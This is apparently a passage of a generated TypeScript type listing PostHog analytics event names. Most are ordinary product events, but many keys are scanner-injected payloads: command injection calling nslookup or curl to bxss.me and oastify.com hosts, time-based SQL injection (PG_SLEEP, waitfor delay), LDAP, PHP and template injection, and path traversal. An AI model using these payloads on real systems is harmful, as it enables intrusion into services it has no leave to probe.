    ';(nslookup hitowflmhltqq9f5c0.bxss.me||perl -e "gethostbyname(\'hitowflmhltqq9f5c0.bxss.me\')")|(nslookup hitowflmhltqq9f5c0.bxss.me||perl -e "gethostbyname(\'hitowflmhltqq9f5c0.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    ';(nslookup hitpalxwfzhjzf4633.bxss.me||perl -e "gethostbyname(\'hitpalxwfzhjzf4633.bxss.me\')")|(nslookup hitpalxwfzhjzf4633.bxss.me||perl -e "gethostbyname(\'hitpalxwfzhjzf4633.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    "&(nslookup hitpcosuiwtsu2500d.bxss.me||perl -e \"gethostbyname('hitpcosuiwtsu2500d.bxss.me')\")&'\\\"`0&(nslookup hitpcosuiwtsu2500d.bxss.me||perl -e \"gethostbyname('hitpcosuiwtsu2500d.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hitpdibbauhss62cbd.bxss.me||perl -e "gethostbyname(\'hitpdibbauhss62cbd.bxss.me\')")`': Record<
        string,
        any
    >
    '(nslookup hitpdifrdxfkb3d93b.bxss.me||perl -e "gethostbyname(\'hitpdifrdxfkb3d93b.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitpkityhparrdbdbc.bxss.me||perl -e "gethostbyname(\'hitpkityhparrdbdbc.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitplbwycorudbb719.bxss.me||perl -e \"gethostbyname('hitplbwycorudbb719.bxss.me')\")&'\\\"`0&(nslookup hitplbwycorudbb719.bxss.me||perl -e \"gethostbyname('hitplbwycorudbb719.bxss.me')\")&`'": Record<
        string,
        any
    >
    '(nslookup hitpmlkmfwxfk874fa.bxss.me||perl -e "gethostbyname(\'hitpmlkmfwxfk874fa.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hitpofegyqjsz4d3f9.bxss.me||perl -e "gethostbyname(\'hitpofegyqjsz4d3f9.bxss.me\')")|(nslookup hitpofegyqjsz4d3f9.bxss.me||perl -e "gethostbyname(\'hitpofegyqjsz4d3f9.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    ';(nslookup hitppjfxfminacf4ac.bxss.me||perl -e "gethostbyname(\'hitppjfxfminacf4ac.bxss.me\')")|(nslookup hitppjfxfminacf4ac.bxss.me||perl -e "gethostbyname(\'hitppjfxfminacf4ac.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '|(nslookup hitpshbesyyct1b86c.bxss.me||perl -e "gethostbyname(\'hitpshbesyyct1b86c.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hitpsxnpjrnsxc6d1a.bxss.me||perl -e "gethostbyname(\'hitpsxnpjrnsxc6d1a.bxss.me\')")|(nslookup hitpsxnpjrnsxc6d1a.bxss.me||perl -e "gethostbyname(\'hitpsxnpjrnsxc6d1a.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    "&(nslookup hitptakzzuuqh43145.bxss.me||perl -e \"gethostbyname('hitptakzzuuqh43145.bxss.me')\")&'\\\"`0&(nslookup hitptakzzuuqh43145.bxss.me||perl -e \"gethostbyname('hitptakzzuuqh43145.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hitpvugmszptg50f38.bxss.me||perl -e "gethostbyname(\'hitpvugmszptg50f38.bxss.me\')")`': Record<
        string,
        any
    >
    '(nslookup hitqafvgafxsc6bfd4.bxss.me||perl -e "gethostbyname(\'hitqafvgafxsc6bfd4.bxss.me\')")': Record<
        string,
        any
    >
    "&(nslookup hitqgtvtlvvxjd60cd.bxss.me||perl -e \"gethostbyname('hitqgtvtlvvxjd60cd.bxss.me')\")&'\\\"`0&(nslookup hitqgtvtlvvxjd60cd.bxss.me||perl -e \"gethostbyname('hitqgtvtlvvxjd60cd.bxss.me')\")&`'": Record<
        string,
        any
    >
    '|(nslookup hitqltqshzgcw6c96a.bxss.me||perl -e "gethostbyname(\'hitqltqshzgcw6c96a.bxss.me\')")': Record<
        string,
        any
    >
    "&(nslookup hitqokubxiwbyb6b9a.bxss.me||perl -e \"gethostbyname('hitqokubxiwbyb6b9a.bxss.me')\")&'\\\"`0&(nslookup hitqokubxiwbyb6b9a.bxss.me||perl -e \"gethostbyname('hitqokubxiwbyb6b9a.bxss.me')\")&`'": Record<
        string,
        any
    >
    "&(nslookup hitqphvsftmxk5f89f.bxss.me||perl -e \"gethostbyname('hitqphvsftmxk5f89f.bxss.me')\")&'\\\"`0&(nslookup hitqphvsftmxk5f89f.bxss.me||perl -e \"gethostbyname('hitqphvsftmxk5f89f.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hitqrislarpgw383da.bxss.me||perl -e "gethostbyname(\'hitqrislarpgw383da.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitqtnygkeajsff6e7.bxss.me||perl -e \"gethostbyname('hitqtnygkeajsff6e7.bxss.me')\")&'\\\"`0&(nslookup hitqtnygkeajsff6e7.bxss.me||perl -e \"gethostbyname('hitqtnygkeajsff6e7.bxss.me')\")&`'": Record<
        string,
        any
    >
    '(nslookup hitqunxttfxjzb29be.bxss.me||perl -e "gethostbyname(\'hitqunxttfxjzb29be.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hitramrageody9ba41.bxss.me||perl -e "gethostbyname(\'hitramrageody9ba41.bxss.me\')")|(nslookup hitramrageody9ba41.bxss.me||perl -e "gethostbyname(\'hitramrageody9ba41.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    ';(nslookup hitrntrgqjqwe7b9f0.bxss.me||perl -e "gethostbyname(\'hitrntrgqjqwe7b9f0.bxss.me\')")|(nslookup hitrntrgqjqwe7b9f0.bxss.me||perl -e "gethostbyname(\'hitrntrgqjqwe7b9f0.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '`(nslookup hitroynsjlmqi61c79.bxss.me||perl -e "gethostbyname(\'hitroynsjlmqi61c79.bxss.me\')")`': Record<
        string,
        any
    >
    '|(nslookup hitrqzmczwsmr9fec2.bxss.me||perl -e "gethostbyname(\'hitrqzmczwsmr9fec2.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitrrzwbcmzws8b9e3.bxss.me||perl -e "gethostbyname(\'hitrrzwbcmzws8b9e3.bxss.me\')")': Record<
        string,
        any
    >
    "&(nslookup hitrskeclyupl93d69.bxss.me||perl -e \"gethostbyname('hitrskeclyupl93d69.bxss.me')\")&'\\\"`0&(nslookup hitrskeclyupl93d69.bxss.me||perl -e \"gethostbyname('hitrskeclyupl93d69.bxss.me')\")&`'": Record<
        string,
        any
    >
    ';(nslookup hitrwsrfrbipy6964d.bxss.me||perl -e "gethostbyname(\'hitrwsrfrbipy6964d.bxss.me\')")|(nslookup hitrwsrfrbipy6964d.bxss.me||perl -e "gethostbyname(\'hitrwsrfrbipy6964d.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '(nslookup hitsmhclonmfr02a7a.bxss.me||perl -e "gethostbyname(\'hitsmhclonmfr02a7a.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitsueuchsvfwba6d7.bxss.me||perl -e "gethostbyname(\'hitsueuchsvfwba6d7.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitsugsvjlkpcc3dc0.bxss.me||perl -e "gethostbyname(\'hitsugsvjlkpcc3dc0.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitsusxktsqyp05c34.bxss.me||perl -e "gethostbyname(\'hitsusxktsqyp05c34.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitsvsddlqpea28f4a.bxss.me||perl -e \"gethostbyname('hitsvsddlqpea28f4a.bxss.me')\")&'\\\"`0&(nslookup hitsvsddlqpea28f4a.bxss.me||perl -e \"gethostbyname('hitsvsddlqpea28f4a.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hittffnfpuwsqb17bc.bxss.me||perl -e "gethostbyname(\'hittffnfpuwsqb17bc.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hittmolhhjeme055ee.bxss.me||perl -e "gethostbyname(\'hittmolhhjeme055ee.bxss.me\')")|(nslookup hittmolhhjeme055ee.bxss.me||perl -e "gethostbyname(\'hittmolhhjeme055ee.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '|(nslookup hittnalplwjig53dc0.bxss.me||perl -e "gethostbyname(\'hittnalplwjig53dc0.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hittpeaswijho20aa7.bxss.me||perl -e "gethostbyname(\'hittpeaswijho20aa7.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hittxsfwnzqna8e9dc.bxss.me||perl -e "gethostbyname(\'hittxsfwnzqna8e9dc.bxss.me\')")|(nslookup hittxsfwnzqna8e9dc.bxss.me||perl -e "gethostbyname(\'hittxsfwnzqna8e9dc.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '(nslookup hittxyoimharl4d88f.bxss.me||perl -e "gethostbyname(\'hittxyoimharl4d88f.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitugfcoeuhfbb6ac0.bxss.me||perl -e "gethostbyname(\'hitugfcoeuhfbb6ac0.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitulaykxgfwfd0bea.bxss.me||perl -e "gethostbyname(\'hitulaykxgfwfd0bea.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hituldwemmqlj8c1c8.bxss.me||perl -e "gethostbyname(\'hituldwemmqlj8c1c8.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hituvzuofmjck10071.bxss.me||perl -e "gethostbyname(\'hituvzuofmjck10071.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hituxkvshmmww0b513.bxss.me||perl -e "gethostbyname(\'hituxkvshmmww0b513.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitvlkwyaxzvgc70a4.bxss.me||perl -e "gethostbyname(\'hitvlkwyaxzvgc70a4.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitvrlcffwzgm3e02a.bxss.me||perl -e \"gethostbyname('hitvrlcffwzgm3e02a.bxss.me')\")&'\\\"`0&(nslookup hitvrlcffwzgm3e02a.bxss.me||perl -e \"gethostbyname('hitvrlcffwzgm3e02a.bxss.me')\")&`'": Record<
        string,
        any
    >
    ';(nslookup hitwdusbmngak8d447.bxss.me||perl -e "gethostbyname(\'hitwdusbmngak8d447.bxss.me\')")|(nslookup hitwdusbmngak8d447.bxss.me||perl -e "gethostbyname(\'hitwdusbmngak8d447.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '|(nslookup hitweabkffkmjd82bb.bxss.me||perl -e "gethostbyname(\'hitweabkffkmjd82bb.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitwecmiufzijf860c.bxss.me||perl -e "gethostbyname(\'hitwecmiufzijf860c.bxss.me\')")`': Record<
        string,
        any
    >
    '|(nslookup hitwgjisaudud01014.bxss.me||perl -e "gethostbyname(\'hitwgjisaudud01014.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitwgqmkrbfsv876de.bxss.me||perl -e "gethostbyname(\'hitwgqmkrbfsv876de.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hitwmbtoyxnpt00bb7.bxss.me||perl -e "gethostbyname(\'hitwmbtoyxnpt00bb7.bxss.me\')")|(nslookup hitwmbtoyxnpt00bb7.bxss.me||perl -e "gethostbyname(\'hitwmbtoyxnpt00bb7.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    "&(nslookup hitwnaovsrsth34f94.bxss.me||perl -e \"gethostbyname('hitwnaovsrsth34f94.bxss.me')\")&'\\\"`0&(nslookup hitwnaovsrsth34f94.bxss.me||perl -e \"gethostbyname('hitwnaovsrsth34f94.bxss.me')\")&`'": Record<
        string,
        any
    >
    ';(nslookup hitwqocmluuls79470.bxss.me||perl -e "gethostbyname(\'hitwqocmluuls79470.bxss.me\')")|(nslookup hitwqocmluuls79470.bxss.me||perl -e "gethostbyname(\'hitwqocmluuls79470.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '(nslookup hitwsqrgcwgzz8bfc1.bxss.me||perl -e "gethostbyname(\'hitwsqrgcwgzz8bfc1.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitwvvipzgbrj8ad6f.bxss.me||perl -e "gethostbyname(\'hitwvvipzgbrj8ad6f.bxss.me\')")': Record<
        string,
        any
    >
    "&(nslookup hitwzxhvdphfmb4736.bxss.me||perl -e \"gethostbyname('hitwzxhvdphfmb4736.bxss.me')\")&'\\\"`0&(nslookup hitwzxhvdphfmb4736.bxss.me||perl -e \"gethostbyname('hitwzxhvdphfmb4736.bxss.me')\")&`'": Record<
        string,
        any
    >
    ';(nslookup hitxacggagmol355e3.bxss.me||perl -e "gethostbyname(\'hitxacggagmol355e3.bxss.me\')")|(nslookup hitxacggagmol355e3.bxss.me||perl -e "gethostbyname(\'hitxacggagmol355e3.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '(nslookup hitxdzbktkcnh41b8f.bxss.me||perl -e "gethostbyname(\'hitxdzbktkcnh41b8f.bxss.me\')")': Record<
        string,
        any
    >
    '`(nslookup hitxhmbrxkyzo568b9.bxss.me||perl -e "gethostbyname(\'hitxhmbrxkyzo568b9.bxss.me\')")`': Record<
        string,
        any
    >
    '`(nslookup hitxidxgsmptf2c8a5.bxss.me||perl -e "gethostbyname(\'hitxidxgsmptf2c8a5.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hitxjwmqxrhcy2b6bb.bxss.me||perl -e "gethostbyname(\'hitxjwmqxrhcy2b6bb.bxss.me\')")|(nslookup hitxjwmqxrhcy2b6bb.bxss.me||perl -e "gethostbyname(\'hitxjwmqxrhcy2b6bb.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '(nslookup hitxkiadrtbjh55c9a.bxss.me||perl -e "gethostbyname(\'hitxkiadrtbjh55c9a.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitxmizltnawd7548e.bxss.me||perl -e "gethostbyname(\'hitxmizltnawd7548e.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitxvyfpaocik18de7.bxss.me||perl -e "gethostbyname(\'hitxvyfpaocik18de7.bxss.me\')")': Record<
        string,
        any
    >
    ';(nslookup hityajbrubsqa6c784.bxss.me||perl -e "gethostbyname(\'hityajbrubsqa6c784.bxss.me\')")|(nslookup hityajbrubsqa6c784.bxss.me||perl -e "gethostbyname(\'hityajbrubsqa6c784.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    "&(nslookup hityfexdxrbqe7b682.bxss.me||perl -e \"gethostbyname('hityfexdxrbqe7b682.bxss.me')\")&'\\\"`0&(nslookup hityfexdxrbqe7b682.bxss.me||perl -e \"gethostbyname('hityfexdxrbqe7b682.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hityhocmgqpki12867.bxss.me||perl -e "gethostbyname(\'hityhocmgqpki12867.bxss.me\')")`': Record<
        string,
        any
    >
    "&(nslookup hitypcmjvrlfj046d1.bxss.me||perl -e \"gethostbyname('hitypcmjvrlfj046d1.bxss.me')\")&'\\\"`0&(nslookup hitypcmjvrlfj046d1.bxss.me||perl -e \"gethostbyname('hitypcmjvrlfj046d1.bxss.me')\")&`'": Record<
        string,
        any
    >
    "&(nslookup hityqavriccgacb512.bxss.me||perl -e \"gethostbyname('hityqavriccgacb512.bxss.me')\")&'\\\"`0&(nslookup hityqavriccgacb512.bxss.me||perl -e \"gethostbyname('hityqavriccgacb512.bxss.me')\")&`'": Record<
        string,
        any
    >
    "&(nslookup hityxctcvrdts27d37.bxss.me||perl -e \"gethostbyname('hityxctcvrdts27d37.bxss.me')\")&'\\\"`0&(nslookup hityxctcvrdts27d37.bxss.me||perl -e \"gethostbyname('hityxctcvrdts27d37.bxss.me')\")&`'": Record<
        string,
        any
    >
    "&(nslookup hitzaechadjmhedc1f.bxss.me||perl -e \"gethostbyname('hitzaechadjmhedc1f.bxss.me')\")&'\\\"`0&(nslookup hitzaechadjmhedc1f.bxss.me||perl -e \"gethostbyname('hitzaechadjmhedc1f.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hitzbxhduiwtx28147.bxss.me||perl -e "gethostbyname(\'hitzbxhduiwtx28147.bxss.me\')")`': Record<
        string,
        any
    >
    '|(nslookup hitzdgmxixpnz95bd3.bxss.me||perl -e "gethostbyname(\'hitzdgmxixpnz95bd3.bxss.me\')")': Record<
        string,
        any
    >
    '|(nslookup hitzeacnasiwb15747.bxss.me||perl -e "gethostbyname(\'hitzeacnasiwb15747.bxss.me\')")': Record<
        string,
        any
    >
    "&(nslookup hitzfbkvzjqxo103a4.bxss.me||perl -e \"gethostbyname('hitzfbkvzjqxo103a4.bxss.me')\")&'\\\"`0&(nslookup hitzfbkvzjqxo103a4.bxss.me||perl -e \"gethostbyname('hitzfbkvzjqxo103a4.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hitzjlrsaenptad804.bxss.me||perl -e "gethostbyname(\'hitzjlrsaenptad804.bxss.me\')")`': Record<
        string,
        any
    >
    ';(nslookup hitzkdktjwybdfbc67.bxss.me||perl -e "gethostbyname(\'hitzkdktjwybdfbc67.bxss.me\')")|(nslookup hitzkdktjwybdfbc67.bxss.me||perl -e "gethostbyname(\'hitzkdktjwybdfbc67.bxss.me\')")&(nslookup hit': Record<
        string,
        any
    >
    '(nslookup hitzrocbcgeqgcd905.bxss.me||perl -e "gethostbyname(\'hitzrocbcgeqgcd905.bxss.me\')")': Record<
        string,
        any
    >
    '(nslookup hitztivujmxar47607.bxss.me||perl -e "gethostbyname(\'hitztivujmxar47607.bxss.me\')")': Record<
        string,
        any
    >
    "&(nslookup hitzurerkazvx4fe1d.bxss.me||perl -e \"gethostbyname('hitzurerkazvx4fe1d.bxss.me')\")&'\\\"`0&(nslookup hitzurerkazvx4fe1d.bxss.me||perl -e \"gethostbyname('hitzurerkazvx4fe1d.bxss.me')\")&`'": Record<
        string,
        any
    >
    '`(nslookup hitzxugqdmnskd1c86.bxss.me||perl -e "gethostbyname(\'hitzxugqdmnskd1c86.bxss.me\')")`': Record<
        string,
        any
    >
    'nslookup -q=cname egy31jb8v98ivz6vhsmqm1gmadg540voorcp4cuzlna.oastify.com.&': Record<string, any>
    '|(nslookup -q=cname hitazkpcfxyrk2d2e6.bxss.me||curl hitazkpcfxyrk2d2e6.bxss.me)': Record<string, any>
    ';(nslookup -q=cname hitbnlleytleza3341.bxss.me||curl hitbnlleytleza3341.bxss.me)|(nslookup -q=cname hitbnlleytleza3341.bxss.me||curl hitbnlleytleza3341.bxss.me)&(nslookup -q=cname hitbnlleytleza3341.b': Record<
        string,
        any
    >
    '(nslookup -q=cname hitcomnuqpvpl40556.bxss.me||curl hitcomnuqpvpl40556.bxss.me))': Record<string, any>
    '|(nslookup -q=cname hitdxzvcooaqb38c0f.bxss.me||curl hitdxzvcooaqb38c0f.bxss.me)': Record<string, any>
    '`(nslookup -q=cname hitevaejuytca77e47.bxss.me||curl hitevaejuytca77e47.bxss.me)`': Record<string, any>
    '`(nslookup -q=cname hithvbzddktwd2e9c9.bxss.me||curl hithvbzddktwd2e9c9.bxss.me)`': Record<string, any>
    "&(nslookup -q=cname hitkajregmhoe4c3d6.bxss.me||curl hitkajregmhoe4c3d6.bxss.me)&'\\\"`0&(nslookup -q=cname hitkajregmhoe4c3d6.bxss.me||curl hitkajregmhoe4c3d6.bxss.me)&`'": Record<
        string,
        any
    >
    '(nslookup -q=cname hitknbijiibsk91b4e.bxss.me||curl hitknbijiibsk91b4e.bxss.me))': Record<string, any>
    ';(nslookup -q=cname hitunhljbvora3ab2d.bxss.me||curl hitunhljbvora3ab2d.bxss.me)|(nslookup -q=cname hitunhljbvora3ab2d.bxss.me||curl hitunhljbvora3ab2d.bxss.me)&(nslookup -q=cname hitunhljbvora3ab2d.b': Record<
        string,
        any
    >
    "&(nslookup -q=cname hitutnxcihwgiaea2e.bxss.me||curl hitutnxcihwgiaea2e.bxss.me)&'\\\"`0&(nslookup -q=cname hitutnxcihwgiaea2e.bxss.me||curl hitutnxcihwgiaea2e.bxss.me)&`'": Record<
        string,
        any
    >
    "&nslookup -q=cname hitvpyllfuqpk1721f.bxss.me&'\\\"`0&nslookup -q=cname hitvpyllfuqpk1721f.bxss.me&`'": Record<
        string,
        any
    >
    "&nslookup -q=cname hitxxosfiwysx5704c.bxss.me&'\\\"`0&nslookup -q=cname hitxxosfiwysx5704c.bxss.me&`'": Record<
        string,
        any
    >
    'nslookup -q=cname sok7rq1kqxlxcfh396vzyns0irokcj0c301soib9zy.oastify.com.&': Record<string, any>
    'Nya Hand': Record<string, any>
    OAP465Jh: Record<string, any>
    '*)(!(objectClass=*)': Record<string, any>
    '*)(objectClass=*': Record<string, any>
    ollys_test_event_08_01_25: Record<string, any>
    ollys_test_event_08_01_25_with_debug: Record<string, any>
    ollys_test_event_08_01_25_with_debug_2: Record<string, any>
    ollys_test_event_08_01_25_with_debug_3: Record<string, any>
    'Oma Hodkiewicz': Record<string, any>
    'onboarding completed': Record<string, any>
    onboarding_completed_survey_trigger: Record<string, any>
    'onboarding product selected': Record<string, any>
    'onboarding step triggered': Record<string, any>
    'onboarding_tasks team setting updated': Record<string, any>
    'one killer recordings improvement survey sent': Record<string, any>
    'onFeatureFlags error': Record<string, any>
    'Opened MaxAI chat': Record<string, any>
    'opened media upload modal': Record<string, any>
    'Opened PostHog AI chat': Record<string, any>
    'opened pricing modal': Record<string, any>
    'opening player inspector': Record<string, any>
    'OpenPhone call completed': Record<string, any>
    'Ophelia Waelchi': Record<string, any>
    'opted into navigation redesign': Record<string, any>
    'opted out of navigation redesign': Record<string, any>
    '../$opt_in': Record<string, any>
    'orbit love report': Record<string, any>
    'Order Completed': Record<string, any>
    order_created: Record<string, any>
    'organization 2fa enforcement toggled': Record<string, any>
    'organization deleted': Record<string, any>
    'organization domain created': Record<string, any>
    'organization domain deleted': Record<string, any>
    'organization environments rollback completed': Record<string, any>
    'organization environments rollback project id conflict': Record<string, any>
    'organization environments rollback started': Record<string, any>
    'organization event usage report': Record<string, any>
    'organization event usage report failure': Record<string, any>
    'organization member removed': Record<string, any>
    'organization quota limits changed': Record<string, any>
    'organization usage report': Record<string, any>
    'organization usage report complete': Record<string, any>
    'organization usage report failure': Record<string, any>
    'organization usage report starting': Record<string, any>
    'organization usage report - test failure': Record<string, any>
    'organization usage report to billing service failure': Record<string, any>
    org_quota_limited_until: Record<string, any>
    'org usage report': Record<string, any>
    'Orie Tremblay': Record<string, any>
    "oROxtBs0')) OR 741=(SELECT 741 FROM PG_SLEEP(15))--": Record<string, any>
    '@@oscYB': Record<string, any>
    'Otho Purdy': Record<string, any>
    "oUT8RKVE'; waitfor delay '0:0:15' -- ": Record<string, any>
    'outer match property groups type changed': Record<string, any>
    '@@oV84D': Record<string, any>
    "P0C3lq1w'; waitfor delay '0:0:15' -- ": Record<string, any>
    paenyCce: Record<string, any>
    page_404: Record<string, any>
    $pageleave: Record<string, any>
    '../$pageview': Record<string, any>
    $pageview: Record<string, any>
    page_view: Record<string, any>
    'Paid Invoices': Record<string, any>
    'palette command executed': Record<string, any>
    'palette command shown': Record<string, any>
    'palette feedback': Record<string, any>
    'palette shown': Record<string, any>
    parse_as_date: Record<string, any>
    'patched meta into web recording': Record<string, any>
    'path_cleaning_filters team setting updated': Record<string, any>
    path_cleaning_regex_ai_applied: Record<string, any>
    'paul test': Record<string, any>
    'pay gate CTA clicked': Record<string, any>
    'pay gate dismissed': Record<string, any>
    'pay gate shown': Record<string, any>
    'payment entry api error': Record<string, any>
    'payment entry stripe error': Record<string, any>
    'payment intent created': Record<string, any>
    'payment intent initiated': Record<string, any>
    'payment intent status checked': Record<string, any>
    'Payton Schimmel': Record<string, any>
    performance_report: Record<string, any>
    'personalization completed': Record<string, any>
    'personalization finalized': Record<string, any>
    'personalization skipped': Record<string, any>
    'person_display_name_properties team setting updated': Record<string, any>
    'person modal cohort created': Record<string, any>
    'person opened from newly seen persons list': Record<string, any>
    'person property added': Record<string, any>
    'person property removed': Record<string, any>
    'person property updated': Record<string, any>
    'persons on events mode updated': Record<string, any>
    'person viewed': Record<string, any>
    "PewTpWPW' OR 92=(SELECT 92 FROM PG_SLEEP(15))--": Record<string, any>
    ph_page_view: Record<string, any>
    "PhrzcGAp')) OR 142=(SELECT 142 FROM PG_SLEEP(15))--": Record<string, any>
    'Phyllis Jaskolski': Record<string, any>
    'Pineapple mode activated': Record<string, any>
    'Pineapple mode deactivated': Record<string, any>
    pineapple_on_pizza_survey: Record<string, any>
    pipedrive_marketplace_oauth_completed: Record<string, any>
    "PKRtFhSQ')) OR 503=(SELECT 503 FROM PG_SLEEP(15))--": Record<string, any>
    played_movie: Record<string, any>
    'Played video': Record<string, any>
    'player seekbar tick tooltip shown': Record<string, any>
    'plugin config updated': Record<string, any>
    'plugin disabled': Record<string, any>
    'plugin enabled': Record<string, any>
    'plugin installed': Record<string, any>
    'plugins disabled for project': Record<string, any>
    'plugins enabled for project': Record<string, any>
    'plugin source edited': Record<string, any>
    'plugin uninstalled': Record<string, any>
    'plugin updated': Record<string, any>
    "pMMuhdXn')) OR 679=(SELECT 679 FROM PG_SLEEP(15))--": Record<string, any>
    "poMVF5SY')) OR 797=(SELECT 797 FROM PG_SLEEP(15))--": Record<string, any>
    'post downvote': Record<string, any>
    'posthog-ci-docker-image-built': Record<string, any>
    'posthog-ci-pr-age-when-closed': Record<string, any>
    'posthog-ci-pr-stats': Record<string, any>
    'posthog-ci-running-time': Record<string, any>
    'posthog cli command run': Record<string, any>
    'posthog-github-automerge-pr-status': Record<string, any>
    'posthog-image-build': Record<string, any>
    posthog_integration_test: Record<string, any>
    'posthog-js debug': Record<string, any>
    'posthog-js-github-release-workflow-failure': Record<string, any>
    'posthog-js-performance-measurement': Record<string, any>
    'posthog pineapple survey survey sent': Record<string, any>
    'posthog-playwright-e2e-running-time': Record<string, any>
    posthog_story_closed: Record<string, any>
    posthog_story_ended: Record<string, any>
    posthog_story_group_clicked: Record<string, any>
    posthog_story_started: Record<string, any>
    'post upvote': Record<string, any>
    'pql hands-on pipeline closed lost': Record<string, any>
    'pql hands-on pipeline closed won': Record<string, any>
    'pql hands-on pipeline commercial and legal review': Record<string, any>
    'pressed interested in notebook sharing': Record<string, any>
    'primary dashboard automatically created': Record<string, any>
    'primary dashboard changed': Record<string, any>
    'primary dashboard modal opened': Record<string, any>
    'primary_dashboard team setting updated': Record<string, any>
    "'.print(md5(31337)).'": Record<string, any>
    "';print(md5(31337));$a='": Record<string, any>
    '";print(md5(31337));$a="': Record<string, any>
    process_task_activity_completed: Record<string, any>
    process_task_activity_failed: Record<string, any>
    process_task_activity_started: Record<string, any>
    process_task_workflow_completed: Record<string, any>
    process_task_workflow_failed: Record<string, any>
    process_task_workflow_started: Record<string, any>
    'product cross sell interaction': Record<string, any>
    'product_description project setting updated': Record<string, any>
    'product empty state shown': Record<string, any>
    product_hunt_update: Record<string, any>
    'product intent marked activated': Record<string, any>
    'product onboarding completed': Record<string, any>
    'product onboarding skipped': Record<string, any>
    'product tour skipped': Record<string, any>
    'product unsubscribed': Record<string, any>
    PROFILE_TEST_FINAL: Record<string, any>
    'project create submitted': Record<string, any>
    'project deleted': Record<string, any>
    'project home item clicked': Record<string, any>
    'project home seen': Record<string, any>
    'project moved to another organization': Record<string, any>
    'project usage report': Record<string, any>
    'prompt backward': Record<string, any>
    'Prompt closed': Record<string, any>
    'prompt forward': Record<string, any>
    'prompt sequence completed': Record<string, any>
    'prompt sequence dismissed': Record<string, any>
    'prompt shown': Record<string, any>
    'Prompt shown': Record<string, any>
    prompt_trigger: Record<string, any>
    'property definition deleted': Record<string, any>
    'property group filter added': Record<string, any>
    'property select toggle opened': Record<string, any>
    proxy_test_YBhtbPXTcc: Record<string, any>
    "psBcOao5'; waitfor delay '0:0:15' -- ": Record<string, any>
    '<p th:text="${T(java.net.InetAddress).getByName(\'mc2bxr7grh4qr723d0iyi9cu6lcd08rwlx9v1ir5it7.oastify.com.\')}"></p>': Record<
        string,
        any
    >
    '@@pu8UC': Record<string, any>
    '@@pUPsE': Record<string, any>
    purchase: Record<string, any>
    purchase_completed: Record<string, any>
    purchased: Record<string, any>
    pXla2b2u: Record<string, any>
    '@@PZCjr': Record<string, any>
    "qA0loXgw') OR 485=(SELECT 485 FROM PG_SLEEP(15))--": Record<string, any>
    "QEc6sTUR') OR 294=(SELECT 294 FROM PG_SLEEP(15))--": Record<string, any>
    "QrCWLzSL'; waitfor delay '0:0:15' -- ": Record<string, any>
    'query async recalculation initiated': Record<string, any>
    'query completed': {
        duration?: number
        is_cached?: boolean
        query?: Record<string, any>
        queryId?: string
    }
    'query duplicate found': Record<string, any>
    'query duplicate registered': Record<string, any>
    'query executed': Record<string, any>
    'query execution details viewed': Record<string, any>
    'query failed': Record<string, any>
    'quota limiting already limited': Record<string, any>
    'quota limiting ignored': Record<string, any>
    'quota limiting suspended': Record<string, any>
    qWATvUFI: Record<string, any>
    ran_demo: Record<string, any>
    random: Record<string, any>
    'Raymond Satterfield': Record<string, any>
    rbac_team_migration_completed: Record<string, any>
    rbac_team_migration_started: Record<string, any>
    reauthentication_completed: Record<string, any>
    reauthentication_modal_dismissed: Record<string, any>
    reauthentication_modal_shown: Record<string, any>
    'recording analyzed': Record<string, any>
    'recording cannot playback yet': Record<string, any>
    'recording console feedback': Record<string, any>
    'recording console logs viewed': Record<string, any>
    'recording_domains team setting updated': Record<string, any>
    'recording event list scrolled': Record<string, any>
